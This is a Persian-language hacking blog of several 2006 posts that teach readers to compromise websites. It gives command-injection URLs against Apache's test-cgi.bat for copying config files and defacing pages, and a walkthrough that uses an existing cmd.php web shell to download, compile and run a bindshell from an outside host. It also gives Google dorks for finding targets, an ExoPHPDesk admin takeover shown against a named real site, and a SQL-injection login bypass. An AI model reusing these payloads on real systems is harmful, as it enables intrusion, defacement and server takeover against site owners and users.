نويسنده :
امیر - ساعت 8:24 روز چهارشنبه سی و یکم خرداد 1385
با عرض سلام خدمت دوستان عزیز.
خیلی ببخشید که یکم دیر شد.من چند روز پیش مطلبی رو می خواستم بذارم که شانسم گرفت پاکش کردم و فهمیدم و گرنه کلا این وبلاگ و تمام وبلاگها دود می شد می رفت هوا.
خوب حالا ولش کنید.
امروز می خوام یک باگ درست حسابی واسه هک سایت بذارم.
شما با استفاده از این روش می تونید سایتهایی رو که اپاچی استفاده می کنن و بر روی سرورهای ویندوز وجود داره رو هک کنید.
باگ اول:
http://site/cgi-bin/test-cgi.bat?|copy+..\conf\httpd.conf+..\htdocs\httpd.conf
شما با استفاده از این باگ می تونید یک کپی از اچ تی تی پی دی در شاخه کانف بردارید.
باگ دوم:
http://site/cgi-bin/test-cgi.bat?|echo+hackerrrr+>>+..\htdocs\index.html
سما با استفاده از این باگ می تونید hackerrrr رو در اندکس سایت قرار بدین.
خوب احتمالا فهمیدی که چه طوری هستش 
نکته:به جای سایت شما باید اسم سایت رو قرار بدین.
خوب اینم از این.
راستی تعداد نطرات کمه ها
خوب من دیگه باید برم.
ایمیل:amirmehdi.h@gmail.com
ایدی:Faghat_Be_Khatere_To6000
وبسایت:www.Hackerrrr.Tk
راستی این سایت اقا پیام دوست خوبم هستش هتما برید www.Expolit.Net.Tf
خوب دیگه خدانگهدار همگی
نويسنده :
امیر - ساعت 9:16 روز جمعه نوزدهم خرداد 1385
با سلام.
امروز اومدم یک نرم افزار سفارشی واسه بعضی از دوستان از جمله اقا بهزاد بذارم.
که این نرم افزار رو من قبلا تحت داس گذاشتم ولی الان گرافیکی اونو می ذار.
با این نرم افزار می تونید ببینید که سایتهایی که از سرور ویندوز استفاده می کنن webdav در انها وجود دارد یا نه.
انشالله در پستهای بعدی واسه هک اینطور سایتها هم نرم افزار می ذارم.
اینم نرم افزار
راستی تعداد نظرات کم شده ها؟؟؟؟
اگه سوالی دارید بپرسید.
ایمیل:amirmehdi.h@gmail.com
ایدی:Faghat_be_khatere_to6000
وبلاگ:www.hackerrrr.Tk
خدانگهدار همگی
نويسنده :
امیر - ساعت 16:58 روز یکشنبه هفتم خرداد 1385
با سلام.امروز می خوام یک حال اساس بدم.
با این روش ميتونين راحت سایت هك كنين با كمترين اطلاعات.حتي براي سرور Linux
اين حفره با نام cmd.php شناخته ميشه پس از اينکه سايت مورد نظرتون دارای اين حفره بود کافيه بدين صورت در آدرس تایپ کنيد:
www.victim.com/downloads/uploads/cmd.php?cmd=id
uid=32125(baker) gid=32125(baker) groups=32125(baker)
اين برای اين هست که بدونيد شما دارای چه سطحی در کامپيوتر مورد نظر هستيد.
حالا نوبت به شناسايی OS سيستم يا همون سیستم عامل برای اينکار اينطور تایپ ميکنيم:
www.victim.com/downloads/uploads/cmd.php?cmd=uname%20-a و جواب معمولا :
Linux dolphin.victim.com 2.4.20-20.9 #1 Mon Aug 18 11:45:58 EDT 2003 i686 i686 i386 GNU/Linux
خوب ميبينيد که سرور لينوکس هست حالا نوبت اينه که از يک bindshell برای نفوذ بدرون اين سرور استفاده کنيد
من اين بايند شل رو برای لينوکس توصيه ميکنم :
http://packetstormsecurity.nl/advisories/suid/bindshell.c
خوب حالا ميخوايم اين بايند شل رو بفرستيم توی سرور مورد نظرمون پس اين کار رو انجام ميديم:
www.victim.com/downloads/uploads/cmd.php?cmd=wget%20http://packetstormsecurity.nl/advisories/suid/bindshell.c
حالا بايد اين بايند شل رو توی اون کامپيوتر کامپايل کنيم کار ساده ای هستش اگه که کمی لينوکس بلد باشيم:
www.victim.com/downloads/uploads/cmd.php?cmd=gcc%20-o%20bind%20bindshell.c
با اينکار بايند شل ما درون ترمينال لينوکس با جی سی سی کامپايل ميشه.
حالا نوبت ران کردن بايند شل هستش :
www.victim.com/downloads/uploads/cmd.php?cmd=./bind
خوب ديگه حالا کافيه به پورت ۱۲۳۴ سرور کانکت بشيد.
خوب ديگه حالا شل داريد يکمی لينوکس بلد باشيد تمومه ميتونيد .
------------------------------------------------------------------------------------
* منظور از www.victim.com آدرس سایتی هست که شما می خوایید هکش کنید .
* برای پیدا کردن سایتی که این حفره رو داره می تونید از گوگل کمک بگیرید به این صورت :
http://www.google.com/search?hl=en&lr=&q=inurl%3Acmd.php+cmd
یا
http://www.google.com/search?hl=en&lr=&q=intitle%3A%22Index+of%22+cmd.php
خوب دیگه.اینم از این.
ایدی:Faghat_be_khatere_to6000
ایمیل:amirmehdi.h@gmail.com
وبسایت:www.Hackerrrr.Tk
خدانگهدار همگی.
نويسنده :
امیر - ساعت 19:51 روز شنبه ششم خرداد 1385
با سلام خدمت دوستان عزیز.
میخوام واستون باگ امنیتیExoPHPDesk رو توضیح بدم که خیلی باحاله اینم هدیه ورود من.
با کمک این باگ که تو پرتال ExoPHPDesk وجود داره شما میتوند یه File فایل php و یا php shell رو روی یه سایت upload کنید و اون رو هک کنید
برای پیدا کردن این سایت ها تو google کلمه:
"Powered by ExoPHPDesk"
را جستجو کنید
اکثر سایت هایی که این پرتال روشونه فایل install.php شون هنوز سر جاشه و Delet نشده
چون برنامه هیچ اخطاری نمی ده به کاربر که اون فایل پاک نشده بعد نصبش
وقتی فایل install رو هم باز میکنید نیازی نیست user , pass , databasename رو وارد کنید خود install.php اونا رو از config میخونه
عمق فاجعه : یعنی شما با دو 3 بار next زدن میتونید database رو restore کنید و در اخر یک user name , password برای مدیر تعریف کنید
این پرتال برای ticket دادن و پشتیبانی کاربرانه و همراه ticket ها یه سری فایل میشه upload کرد
البته php نمیشه ولی شما چون الان admin هستید اوضاع فرق میکنه از منوی تنظیمات ادمین کاری میکنید که بشه
حالا مراحل بالا در قالب ادرس اونا
من رو این سایت این کار ها رو انجام میدم
http://www.cliquesc.com/helpdeskتو محله سوم step 3 باید تو اون فیلد خالی یه ادرس email بنویسید
بعد اینکه تو install.php چند بار next زدید نوبت می رسه به اینکه user admin بسازید اون رو هم که ساختید باید login کنید
برید http://www.cliquesc.com/helpdesk/admin.phpخوب حالا تو تا گزینه می بینید یکی session یکی cookie | تیک cookie رو بزنید و login کنید
http://www.cliquesc.com/helpdesk/adm...=configuration
بعد اینکه login کردم می رم تو این ادرس تا config رو عوض کنم و بتونم فایل های php اپلود کنم
تو اخراش به جای
gif, .jpg, .jpeg, .txt, .htm, .html بنویسید
gif, .jpg, .jpeg, .txt, .htm, .html, .php
منبع:یادم نیست به خدا.
ایمیل:amirmehdi.h@gmail.com
ایدی:faghat_be_khatere_to6000
وبسایت:www.Hackerrrr.Tk
نويسنده :
امیر - ساعت 17:18 روز پنجشنبه چهارم خرداد 1385
با سلام خدمت دوستان عزیز.
امیدوارم که حالتون خوب باشه.
امروز اومدم که یک روش برای هک سایت بگم.
شما با این روش می تونید سایت هایی رو که از asp news استفاده می کنه رو هک کنید.
خوب برای سرچ به این لینک برید http://www.google.com/search?hl=en&lr=&q=acnews+1.0+login.asp&btnG=Search
این لینک سرچ می باشد.
بعد از دیدن و باز کردن سایت ها اگر به صفحه لوگین رفتین باید در یوزر بنویسید ' or 'x'='x
و پسوورد ' or 'x'='x
نکته:::::اینو بگم که ' اخری رو باید در اول قبل از or با یک فاصله بذارید.
نکته۲:::این به روش اس کیوو ال می باشد.
خوب این از این.دیگه چی می خواین.
راستی می بینم تعداد نظرات پایین رفته؟؟؟؟
خوب نظر بدین تا من هم از این کارا زیاد بکنم.
راستی کپی برداری فقط با ذکر نام و لینک کامل مجاز می باشد.
ایمیل:amirmehdi.h@gmail.com
ایدی:Faghat_be_khatere_to6000
وبسایت:www.Hackerrrr.Tk
خدانگهدار همگی
نويسنده :
امیر - ساعت 9:11 روز دوشنبه یکم خرداد 1385
با سلام.
امروز اومدم یک باگ واسه هک فروم یا PhPbb بذارم.حتما می دونید که چیه؟
خوب این باگ واسه phpbb 2.17 می باشد.این باگ یکم قدیمیه اما کار باهاش خالی از لطف نیست.
راستی تصمیم گرفتم که چند مدتی فقط باگ و اکسپلویت واستون بذارم تا حال کنید.
اینم اکسپلویت :::::: اکسپلویت
این اکسپلویت به زبان پرل هست.
خوب دوستان عزیز نظر بدین تا من جدید ترین رو بذارم.
منتظر نظرات هستم.
ایمیل:amirmehdi.h@gmail.com
ایدی:faghat_be_khatere_to6000
وبلاگ:www.Hackerrrr.Tk
راستی اگر سوالی دارید می تونید مطرح کنید.
خدانگهدار همگی.
